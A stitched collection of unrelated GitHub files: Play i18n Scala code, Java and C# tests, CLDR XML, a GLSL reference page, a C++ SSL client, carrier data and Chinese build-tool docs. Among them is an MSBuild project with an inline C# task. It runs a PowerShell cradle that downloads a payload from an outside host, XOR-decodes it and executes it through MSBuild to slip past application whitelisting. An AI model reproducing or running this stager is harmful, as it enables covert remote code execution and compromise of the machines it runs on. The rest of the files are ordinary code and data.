final val allMessagesJson: JsValue = Json.toJson(allMessages)
// Cache of all the messages map as a JSON object
private val allMessagesCache: String = allMessagesJson.toString()
// Per lang cache of the messages
private val messagesCache: Map[String, String] = allMessages.view.mapValues(map => formatMap(map)).toMap
/**
* @param messages Messages instance containing the lang to retrieve messages for
* @return The messages defined for the given language `lang`, as a map
* of (key -> message). The message corresponding to a given key is found by searching in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*/
def messages(implicit messages: Messages): Map[String, String] = lookupLang(allMessages, messages)
/**
* @param messages Messages instance containing the lang to retrieve messages for
   * @return The JSON formatted string of the messages for the given language `lang`. This is strictly equivalent to
* `Json.toJson(jsMessages.messages).toString`, but may be faster due to the use of caching.
*/
def messagesString(implicit messages: Messages): String = lookupLang(messagesCache, messages)
/**
* Generates a JavaScript function computing localized messages in the given implicit `Lang`.
*
* For example:
*
* {{{
* val messages = Action { implicit request =>
* Ok(jsMessages(Some("window.Messages")))
* }
* }}}
*
* Then use it in your JavaScript code as follows:
*
* {{{
* alert(Messages('greeting', 'World'));
* }}}
*
* Provided you have the following message in your `conf/messages` file:
*
* {{{
* greeting=Hello {0}!
* }}}
*
* Note: This implementation does not handle quotes escaping in patterns and subformats (see
* http://docs.oracle.com/javase/8/docs/api/java/text/MessageFormat.html)
*
* @param namespace Optional JavaScript namespace to use to put the function definition. If not set, this
* function will just generate a function. Otherwise it will generate a function and assign
* it to the given namespace. Note: you can set something like `Some("var Messages")` to use
* a fresh variable.
* @param messages Messages instance defining the language to use. The message corresponding to a given key is found by searching in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*/
def apply(namespace: Option[String] = None)(implicit messages: Messages): JavaScript = apply(namespace, messagesString)
/**
* Generates a JavaScript function computing localized messages in all the languages of the application.
*
* For example:
*
* {{{
* val messages = Action {
* Ok(jsMessages.all(Some("window.Messages")))
* }
* }}}
*
* Then use it in your JavaScript code as follows:
*
* {{{
* alert(Messages('en', 'greeting', 'World'));
* }}}
*
* Provided you have the following message in your `conf/messages` file:
*
* {{{
* greeting=Hello {0}!
* }}}
*
   * Note that, given a message key, the JavaScript function will search for the corresponding message in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*
* Note: This implementation does not handle quotes escaping in patterns and subformats (see
* http://docs.oracle.com/javase/8/docs/api/java/text/MessageFormat.html)
*
* @param namespace Optional JavaScript namespace to use to put the function definition. If not set, this
* function will just generate a function. Otherwise it will generate a function and
* assign it to the given namespace. Note: you can set something like
* `Some("var Messages")` to use a fresh variable.
*/
def all(namespace: Option[String] = None): JavaScript = all(namespace, allMessagesCache)
/**
* @param namespace Optional namespace that will contain the generated function
* @param messages Map of (key -> message) to use, as a JSON literal
* @return a JavaScript function taking a key and eventual arguments and returning a formatted message
*/
private def apply(namespace: Option[String], messages: String): JavaScript = {
JavaScript(s""" #${namespace.map{_ + "="}.getOrElse("")}(function(u){function f(k){
#var m;
#if(typeof k==='object'){
#for(var i=0,l=k.length;i<l&&f.messages[k[i]]===u;++i);
#m=f.messages[k[i]]||k[0]
#}else{
#m=((f.messages[k]!==u)?f.messages[k]:k)
#}
#for(i=1;i<arguments.length;i++){
#m=m.replace('{'+(i-1)+'}',arguments[i])
#}
#return m};
#f.messages=$messages;
#return f})()""".stripMargin('#'))
}
/*
* @param namespace Optional JavaScript namespace to use to put the function definition. If not set, this function will
* just return a literal function. Otherwise it will generate a function and assign it to the given namespace.
* Note: you can set something like `Some("var Messages")` to use a fresh variable.
* @param messages String correctly formatted as JSON corresponding the to Map of messages.
* @return A JavaScript fragment defining a function computing all messages
*/
private def all(namespace: Option[String], messages: String): JavaScript = {
// g(key): given a lang, try to find a key among all possible messages,
// will try lang, lang.language, default and finally default.play
// h(key,args...): return the formatted message retrieved from g(lang,key)
// f(lang,key,args...): if only lang, return anonymous function always calling h by prefixing arguments with lang
// else, just call h with current arguments
JavaScript(s""" #${namespace.map{_ + "="}.getOrElse("")}(function(u){function f(l,k){
#function g(kg){
#var r=f.messages[l] && f.messages[l][kg];
#if (r===u&&l&&l.indexOf('-')>-1) {var lg=l.split('-')[0];r=f.messages[lg] && f.messages[lg][kg];}
#if (r===u) {r=f.messages['default'] && f.messages['default'][kg];}
#if (r===u) {r=f.messages['default.play'] && f.messages['default.play'][kg];}
#return r;
#}
#function h(kh){
#var m;
#if(typeof kh==='object'){
#for(var i=0,le=kh.length;i<le&&g(kh[i])===u;++i);
#m=g(kh[i])||kh[0];
#}else{
#m=g(kh);
#m=((m!==u)?m:kh);
#}
#for(i=1,le=arguments.length;i<le;++i){
#m=m.replace('{'+(i-1)+'}',arguments[i])
#}
#return m;
#}
#if(k===undefined){
#return h;
#}else{
#return h.apply({}, Array.prototype.slice.call(arguments, 1));
#}
#}
#f.messages=$messages;
#return f})()""".stripMargin('#'))
}
private def formatMap[A : Writes](map: Map[String, A]): String = Json.toJson(map).toString()
private def extractCountry(lang: String): Option[String] = if (lang.contains("-")) Some(lang.split("-")(0)) else None
private def lookupLang[A](data: Map[String, A], messages: Messages): A = {
val lang = messages.lang
// Try to get the messages for the lang
data.get(lang.code)
// If none, try to get it from its country
.orElse(extractCountry(lang.code).flatMap(country => data.get(country)))
// If none, fallback to default
.orElse(data.get("default"))
      // If none, screw that, crash the system! It's your fault for not having a default.
.getOrElse(sys.error(s"Lang $lang is not supported by the application. Consider adding it to your 'application.langs' key in your 'conf/application.conf' file or at least provide a default messages file."))
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 - 2020 Blazebit.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.blazebit.persistence.view.testsuite.collections.ordered.model;
import com.blazebit.persistence.view.EntityView;
import com.blazebit.persistence.view.IdMapping;
import com.blazebit.persistence.view.testsuite.collections.entity.simple.DocumentForCollections;
/**
*
* @author Christian Beikov
* @since 1.0.0
*/
@EntityView(DocumentForCollections.class)
public interface BaseDocumentView {
@IdMapping
public Long getId();
public String getName();
public PersonWithSetAsListView getOwner();
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<ldml>
<identity>
<language type="en"/>
</identity>
<dates>
<calendars>
<calendar type="buddhist">
<eras>
<eraAbbr>
<era type="0">BE</era>
</eraAbbr>
</eras>
</calendar>
<calendar type="chinese">
<months>
<monthContext type="format">
<monthWidth type="abbreviated">
<month type="1">Mo1</month>
<month type="2">Mo2</month>
<month type="3">Mo3</month>
<month type="4">Mo4</month>
<month type="5">Mo5</month>
<month type="6">Mo6</month>
<month type="7">Mo7</month>
<month type="8">Mo8</month>
<month type="9">Mo9</month>
<month type="10">Mo10</month>
<month type="11">Mo11</month>
<month type="12">Mo12</month>
</monthWidth>
<monthWidth type="wide">
<month type="1">First Month</month>
<month type="2">Second Month</month>
<month type="3">Third Month</month>
<month type="4">Fourth Month</month>
<month type="5">Fifth Month</month>
<month type="6">Sixth Month</month>
<month type="7">Seventh Month</month>
<month type="8">Eighth Month</month>
<month type="9">Ninth Month</month>
<month type="10">Tenth Month</month>
<month type="11">Eleventh Month</month>
<month type="12">Twelfth Month</month>
</monthWidth>
</monthContext>
</months>
<cyclicNameSets>
<cyclicNameSet type="zodiacs">
<cyclicNameContext type="format">
<cyclicNameWidth type="abbreviated">
<cyclicName type="1">Rat</cyclicName>
<cyclicName type="2">Ox</cyclicName>
<cyclicName type="3">Tiger</cyclicName>
<cyclicName type="4">Rabbit</cyclicName>
<cyclicName type="5">Dragon</cyclicName>
<cyclicName type="6">Snake</cyclicName>
<cyclicName type="7">Horse</cyclicName>
<cyclicName type="8">Goat</cyclicName>
<cyclicName type="9">Monkey</cyclicName>
<cyclicName type="10">Rooster</cyclicName>
<cyclicName type="11">Dog</cyclicName>
<cyclicName type="12">Pig</cyclicName>
</cyclicNameWidth>
</cyclicNameContext>
</cyclicNameSet>
</cyclicNameSets>
</calendar>
<calendar type="generic">
</calendar>
<calendar type="gregorian">
<months>
<monthContext type="format">
<monthWidth type="wide">
<month type="1">enWideM1</month>
<month type="2">enWideM2</month>
<month type="3">enWideM3</month>
<month type="4">enWideM4</month>
<month type="5">enWideM5</month>
<month type="6">enWideM6</month>
<month type="7">enWideM7</month>
<month type="8">enWideM8</month>
<month type="9">enWideM9</month>
<month type="10">enWideM10</month>
<month type="11">enWideM11</month>
<month type="12">enWideM12</month>
</monthWidth>
</monthContext>
<monthContext type="stand-alone">
<monthWidth type="narrow">
<month type="1">enNarrowM1</month>
<month type="2">enNarrowM2</month>
<month type="3">enNarrowM3</month>
<month type="4">enNarrowM4</month>
<month type="5">enNarrowM5</month>
<month type="6">enNarrowM6</month>
<!-- missing -->
<month type="8">enNarrowM8</month>
<month type="9">enNarrowM9</month>
<month type="10">enNarrowM10</month>
<month type="11">enNarrowM11</month>
<month type="12">enNarrowM12</month>
</monthWidth>
</monthContext>
</months>
<eras>
<eraNames>
<era type="0">Before Christ</era>
<era type="0" alt="variant">Before Common Era</era>
<era type="1">Anno Domini</era>
<era type="1" alt="variant">Common Era</era>
</eraNames>
<eraAbbr>
<era type="0">BC</era>
<era type="0" alt="variant">BCE</era>
<era type="1">AD</era>
<era type="1" alt="variant">CE</era>
</eraAbbr>
<!-- nothing for eraNarrow -->
</eras>
</calendar>
<calendar type="hebrew">
<eras>
<eraAbbr>
<era type="0">AM</era>
</eraAbbr>
</eras>
</calendar>
<calendar type="islamic">
<eras>
<eraAbbr>
<era type="0">AH</era>
</eraAbbr>
</eras>
</calendar>
</calendars>
<fields>
<field type="era">
<displayName>era</displayName>
</field>
<field type="month">
<displayName>month</displayName>
<relative type="-1">last month</relative>
<relative type="0">this month</relative>
<relative type="1">next month</relative>
<relativeTime type="future">
<relativeTimePattern count="one">enFutMOne</relativeTimePattern>
<relativeTimePattern count="other">enFutMOther</relativeTimePattern>
</relativeTime>
<relativeTime type="past">
<relativeTimePattern count="one">enPastMOne</relativeTimePattern>
<relativeTimePattern count="other">enPastMOther</relativeTimePattern>
</relativeTime>
</field>
<field type="month-short">
<displayName>mo.</displayName>
<relative type="-1">last mo.</relative>
<relative type="0">this mo.</relative>
<relative type="1">next mo.</relative>
<relativeTime type="future">
<relativeTimePattern count="one">enShortFutMOne</relativeTimePattern>
<relativeTimePattern count="other">enShortFutMOther</relativeTimePattern>
</relativeTime>
<relativeTime type="past">
<relativeTimePattern count="one">enShortPastMOne</relativeTimePattern>
<relativeTimePattern count="other">enShortPastMOther</relativeTimePattern>
</relativeTime>
</field>
</fields>
</dates>
</ldml>
| {
"pile_set_name": "Github"
} |
<div class="refentry" id="gl_Position">
<div class="titlepage"></div>
<div class="refnamediv">
<h2>Name</h2>
<p>gl_Position — contains the position of the current vertex</p>
</div>
<div class="refsynopsisdiv">
<h2>Declaration</h2>
<p>
<code class="varname">gl_Position</code> is a member of the
<code class="varname">gl_PerVertex</code> named block:
</p>
<pre class="programlisting"> out gl_PerVertex {
vec4 gl_Position;
float gl_PointSize;
float gl_ClipDistance[];
};</pre>
<p>
</p>
</div>
<div class="refsect1" id="description">
<h2>Description</h2>
<p>
In the vertex, tessellation evaluation and geometry languages, a single
global instance of the <code class="varname">gl_PerVertex</code> named block is available and
its <code class="varname">gl_Position</code> member is an output that receives the
homogeneous vertex position. It may be written at any time during shader execution.
The value written to <code class="varname">gl_Position</code> will be used by primitive assembly,
clipping, culling and other fixed functionality operations, if present, that operate on
primitives after vertex processing has occurred.
</p>
<p>
In the tessellation control language, the <code class="varname">gl_PerVertex</code> named block
is used to construct an array, <code class="varname">gl_out[]</code>, whose <code class="varname">gl_Position</code>
members hold the homogeneous control point position, which become available as inputs to the subsequent
tessellation evaluation shader.
</p>
<p>
The value of <code class="varname">gl_Position</code> (or the <code class="varname">gl_Position</code> member of the <code class="varname">gl_out[]</code>
array, in the case of the tessellation control shader)
is undefined after the vertex, tessellation control, and tessellation evaluation
shading stages if the corresponding shader executable does
not write to gl_Position. It is also undefined after the geometry processing stage if the geometry shader executable calls
<a class="citerefentry" href="EmitVertex"><span class="citerefentry"><span class="refentrytitle">EmitVertex</span></span></a> without having
written <code class="varname">gl_Position</code> since the last call to <a class="citerefentry" href="EmitVertex"><span class="citerefentry"><span class="refentrytitle">EmitVertex</span></span></a>
(or hasn't written it at all).
</p>
<p>
In the tessellation control, tessellation evaluation and geometry languages,
the <code class="varname">gl_PerVertex</code> named block is used to construct an array, <code class="varname">gl_in[]</code>
of per-vertex or per-control point inputs whose content represents the corresponding
outputs written by the previous stage.
</p>
</div>
{$pipelinestall}{$examples}
<div class="refsect1" id="versions">
<h2>Version Support</h2>
<div class="informaltable">
<table style="border-collapse: collapse; border-top: 2px solid ; border-bottom: 2px solid ; border-left: 2px solid ; border-right: 2px solid ; ">
<colgroup>
<col style="text-align: left; "/>
<col style="text-align: center; " class="firstvers"/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; " class="lastvers"/>
</colgroup>
<thead>
<tr>
<th style="text-align: left; border-right: 2px solid ; ">
</th>
<th style="text-align: center; border-bottom: 2px solid ; " colspan="12">
<span class="bold"><strong>OpenGL Shading Language Version</strong></span>
</th>
</tr>
<tr>
<th style="text-align: left; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>Function Name</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.10</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.20</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.30</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.40</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.50</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>3.30</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.00</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.10</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.20</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.30</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.40</strong></span>
</th>
<th style="text-align: center; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.50</strong></span>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left; border-right: 2px solid ; ">gl_Position</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; ">✔</td>
</tr>
</tbody>
</table>
</div>
<p>Versions 1.10 to 1.40 - vertex shader only.</p>
<p>Versions 1.50 to 3.30 - vertex and geometry shaders only.</p>
</div>
<div class="refsect1" id="seealso">
<h2>See Also</h2>
<p>
<a class="citerefentry" href="gl_PointSize"><span class="citerefentry"><span class="refentrytitle">gl_PointSize</span></span></a>, <a class="citerefentry" href="gl_ClipDistance"><span class="citerefentry"><span class="refentrytitle">gl_ClipDistance</span></span></a>
</p>
</div>
<div class="refsect1" id="Copyright">
<h2>Copyright</h2>
<p>
Copyright © 2011-2014 Khronos Group.
This material may be distributed subject to the terms and conditions set forth in
the Open Publication License, v 1.0, 8 June 1999.
<a class="link" href="https://opencontent.org/openpub/" target="_top">https://opencontent.org/openpub/</a>.
</p>
</div>
</div>
| {
"pile_set_name": "Github"
} |
/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// +k8s:deepcopy-gen=package
// +k8s:protobuf-gen=package
// +groupName=storage.k8s.io
// +k8s:openapi-gen=true
package v1beta1 // import "k8s.io/api/storage/v1beta1"
| {
"pile_set_name": "Github"
} |
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#include "Client.h"
#include "LogBase.h"
#include "Network_def.h"
#include "Messages.pb.h"
#include <boost/lexical_cast.hpp>
using namespace util;
Client::Client(boost::asio::io_service& io_service,
boost::asio::ssl::context& context,
boost::asio::ip::tcp::resolver::iterator endpoint_iterator) : AbstractNetworkOps(io_service, context) {
socket_.set_verify_mode(boost::asio::ssl::verify_peer);
socket_.set_verify_callback(boost::bind(&Client::verify_certificate, this, _1, _2));
this->endpoint_iterator = endpoint_iterator;
}
Client::~Client() {}
void Client::startConnection() {
Log("Start connecting...");
boost::system::error_code ec;
boost::asio::connect(socket_.lowest_layer(), this->endpoint_iterator, ec);
handle_connect(ec);
}
bool Client::verify_certificate(bool preverified, boost::asio::ssl::verify_context& ctx) {
char subject_name[256];
X509* cert = X509_STORE_CTX_get_current_cert(ctx.native_handle());
X509_NAME_oneline(X509_get_subject_name(cert), subject_name, 256);
Log("Verifying certificate: %s", subject_name);
return preverified;
}
void Client::handle_connect(const boost::system::error_code &error) {
if (!error) {
Log("Connection established");
boost::system::error_code ec;
socket_.handshake(boost::asio::ssl::stream_base::client, ec);
handle_handshake(ec);
} else {
Log("Connect failed: %s", error.message(), log::error);
}
}
void Client::handle_handshake(const boost::system::error_code& error) {
if (!error) {
Log("Handshake successful");
auto ret = this->callback_handler("", -1);
send(ret);
} else {
Log("Handshake failed: %s", error.message(), log::error);
}
}
| {
"pile_set_name": "Github"
} |
using System.Web.Routing;
using Glimpse.AspNet.Model;
using Xunit;
namespace Glimpse.Test.AspNet.Model
{
public class RouteModelShould
{
[Fact]
public void SetProperties()
{
var defaults = new[] { new RouteDataItemModel { PlaceHolder = "controller", DefaultValue = "Home" } };
var constraints = new[] { new RouteConstraintModel { IsMatch = true, ParameterName = "action", Constraint = ".+" } };
var dataTokens = new RouteValueDictionary(new { area = "Test", name = "Hi" });
var url = "{controller}/{action}/{id}";
var test = new RouteModel();
test.Area = "Test";
test.Url = url;
test.RouteData = defaults;
test.Constraints = constraints;
test.DataTokens = dataTokens;
Assert.False(test.IsMatch);
Assert.Equal("Test", test.Area);
Assert.Equal(url, test.Url);
Assert.Same(defaults, test.RouteData);
Assert.Same(constraints, test.Constraints);
Assert.Same(dataTokens, test.DataTokens);
test.IsMatch = true;
Assert.True(test.IsMatch);
}
}
} | {
"pile_set_name": "Github"
} |
function [ ref_x, ref_y ] = Refined_seed( Region, r,deta )
[x,y]=meshgrid(1:(2*r));
g=sqrt((x-r).^2+(y-r).^2);
% create Gaussian weighting function centred on the region
z=exp(-((g.^2)/(deta^2*2 )));
% z=exp(-(1/((50*r)^2 *2))*g.^2);
Region=Region+0.01;
temp_Region = Region.* z;
max_temp = max(max(temp_Region));
index=find(temp_Region==max_temp);
ref_y = mod(index(1),(2*r));
if( ref_y == 0)
ref_y = 2*r;
end
ref_x = (index(1)-ref_y)/(2*r)+1;
end
| {
"pile_set_name": "Github"
} |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Author: Pierre-Alexandre Braeken, Twitter: @pabraeken -->
  <!-- Based on Casey Smith's work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<Target Name="34rfas">
<QWEridxnaPO />
</Target>
<UsingTask
TaskName="QWEridxnaPO"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class QWEridxnaPO : Task, ITask {
public override bool Execute() {
string pok = "$WC=NeW-OBJecT SyStem.NET.WEbCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeAders.ADd('User-Agent',$u);$Wc.ProxY = [SYsTem.NET.WEBREQUesT]::DEFAuLtWebPRoxy;$WC.PROxY.CrEdentIalS = [SYSteM.Net.CreDentialCACHe]::DEFAulTNETWOrkCrEdEnTialS;$K='daf00538a3dfee3f25671a3f9d076377';$i=0;[Char[]]$B=([char[]]($Wc.DownLoADSTriNG('http://10.0.2.15:8080/index.asp')))|%{$_-bXoR$K[$I++%$K.LENGTH]};IEX ($b-joiN'')";
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(pok);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project> | {
"pile_set_name": "Github"
} |
[expect php]
[file]
<?php
require('Phalanger.inc');
$i = 0;
$str = '';
while ($i<256) {
$str .= chr($i++);
}
__var_dump(md5(strrev($str)));
__var_dump(strrev(NULL));
__var_dump(strrev(""));
?> | {
"pile_set_name": "Github"
} |
# Copyright (C) 2013 The Libphonenumber Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
223200|Orange
2232079|Sotelma
223217|Sotelma
2235|Atel
2236|Sotelma
2237|Orange
22382|Orange
22383|Orange
22389|Sotelma
22390|Orange
22391|Orange
22392|Orange
22393|Orange
22394|Orange
22395|Sotelma
22396|Sotelma
22397|Sotelma
22398|Sotelma
22399|Sotelma
| {
"pile_set_name": "Github"
} |
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CONTENT_SHELL_BROWSER_SHELL_PLUGIN_SERVICE_FILTER_H_
#define CONTENT_SHELL_BROWSER_SHELL_PLUGIN_SERVICE_FILTER_H_
#include "base/basictypes.h"
#include "base/compiler_specific.h"
#include "content/public/browser/plugin_service_filter.h"
namespace content {
class ShellPluginServiceFilter : public PluginServiceFilter {
public:
ShellPluginServiceFilter();
virtual ~ShellPluginServiceFilter();
// PluginServiceFilter implementation.
virtual bool IsPluginAvailable(int render_process_id,
int render_frame_id,
const void* context,
const GURL& url,
const GURL& policy_url,
WebPluginInfo* plugin) OVERRIDE;
virtual bool CanLoadPlugin(int render_process_id,
const base::FilePath& path) OVERRIDE;
private:
DISALLOW_COPY_AND_ASSIGN(ShellPluginServiceFilter);
};
} // namespace content
#endif // CONTENT_SHELL_BROWSER_SHELL_PLUGIN_SERVICE_FILTER_H_
| {
"pile_set_name": "Github"
} |
import {ApiModelProperty} from '@nestjs/swagger';
import {IsString} from 'class-validator';
import {Column, Entity, ObjectIdColumn} from 'typeorm';
import {ExtendedEntity} from '../../_helpers';
@Entity()
export class ConversationEntity extends ExtendedEntity {
@ApiModelProperty()
@ObjectIdColumn()
public id: string;
@ApiModelProperty()
@IsString()
@Column()
public homeId: string;
@ApiModelProperty()
@IsString()
@Column()
public authorId: string;
@ApiModelProperty()
@IsString()
@Column()
public type: string;
}
| {
"pile_set_name": "Github"
} |
# Built-in Processors
> The built-in processors have their own dependencies: if you use one of them, install the dependency listed below first. For example, the stylus processor requires the `stylus` dependency: `npm i stylus --save-dev`.
## Style-related
* `less`
    * Dependency: `less`
    * Default extension: `less`
    * Processor options: see the official [less](http://lesscss.org/usage/#programmatic-usage) docs
* `stylus`
    * Dependency: `stylus`
    * Default extension: `styl`
    * Processor options: see the official [stylus](http://stylus-lang.com/docs/js.html) docs
* `sass`
    * Dependency: `node-sass`
    * Default extensions: `sass`, `scss`
    * Processor options: see the official [sass](https://github.com/sass/node-sass) docs
* `postcss`: CSS post-processor; the built-in postcss plugins it ships with are listed in [Postcss Plugins](#postcss-plugins)
    * Dependency: `postcss`
    * Default extension: none
    * Processor options: see the official [postcss](https://postcss.org/) docs
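For illustration, a minimal sketch of wiring one of these style processors into the build (assuming `stylus` is installed; the rule shape mirrors the other examples in this document, and the options object is simply an assumption about what gets forwarded to the stylus compiler):
```javascript
{
    rules: [
        {
            // process .styl files with the built-in stylus processor
            match: '*.styl',
            processors: [
                {
                    name: 'stylus',
                    options: {
                        // options here are forwarded to the stylus compiler (assumption)
                    }
                }
            ]
        }
    ]
}
```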
## Component-related
* `component`: the processor that compiles single-file components; it is a core processor and needs no extra dependency
    * Default extension: determined by the `component.extname` setting of the build config
* `view`: compiles the template part of a single-file component into the template syntax supported by the native mini program; a core processor, no extra dependency needed
    * Default extension: `tpl`
* ~~`componentGenerator`~~ `quickComponentGenerator` (changed in `0.4.9`): `supported since version 0.4`; generates SFC files, i.e. the inverse of the `component` processor; a core processor for `Quick App`.
## Template-related
* `pug`: support for the [pug](https://github.com/pugjs/pug) template syntax. To keep templates written in this syntax able to use the extended template syntax of the `okam` framework, add the following configuration
    * Default extension: `pug`
```javascript
{
    processors: {
        pug: {
            options: {
                doctype: 'xml',
                data: {
                    name: 'efe-blue'
                }
            }
        },
        view: {
            // Define the file extensions handled by the mini program template transform;
            // adding this is required so the extended template syntax keeps working.
            // By default the pug processor has a higher priority than view.
            extnames: ['pug', 'tpl']
        }
    },
    rules: []
}
```
## Script-related
* `babel`: the Babel 6 transpile processor; component compilation depends on it by default (alternatively, `babel7` can be used)
    * Dependency: `babel-core`
    * Default extension: none
    * Processor options: see the official [babel](https://babeljs.io/docs/en/babel-core) docs
    * The `plugins` option is extended to also accept a `function`, so you can return additional Babel plugins per file:
```javascript
{
    processors: {
        babel: {
            options: {
                plugins(file) {
                    if (file.path.indexOf('src/') === 0) {
                        return [
                            'external-helpers'
                        ];
                    }
                }
            }
        }
    }
}
```
* `babel7`
    * Dependency: `@babel/core`
    * Default extension: none
    * Processor options: see the official [babel](https://babeljs.io/docs/en/v7-migration) docs
* `typescript`
    * Dependencies: `@babel/core` `@babel/preset-typescript`
    * Default extension: `ts`
    * TypeScript syntax: see the official [typescript](https://www.typescriptlang.org/) docs
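A minimal sketch of enabling the `typescript` processor (assuming `@babel/core` and `@babel/preset-typescript` are installed; chaining it with `babel7` and the exact rule shape are assumptions modelled on the other examples in this document):
```javascript
{
    rules: [
        {
            // compile .ts sources: TypeScript first, then the regular Babel 7 transpile step
            match: '*.ts',
            processors: [
                { name: 'typescript' },
                { name: 'babel7' }
            ]
        }
    ]
}
```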
## Config-related
* `componentJson`: the component config processor, an internal core processor
* `configJson`: `supported since version 0.4`; a core processor that lets you write platform-specific configuration, see [platform-specific config](advance/platformSpecCode#配置)
* `quickAppJson`: `supported since version 0.4`; the core processor for Quick App configuration
## Other Processors
* `json5`: converts `json5` syntax into `json` (a usage sketch is shown after this list)
    * Dependency: `json5`
    * Default extension: `json5`
* `replacement`: content replacement processor
    * Dependency: none
    * Processor options: `Object|Array`, see the example below
```javascript
{
    rules: [
        {
            match: '*.js',
            processors: [
                {
                    name: 'replacement',
                    // object form: a map of search value -> replacement
                    options: {
                        'http://online.com': 'http://test.com',
                        'http://online.com': '${devServer}'
                    },
                    // or, alternatively, the array form:
                    options: [
                        // an entry can be a function
                        function (content) {
                            return content;
                        },
                        {
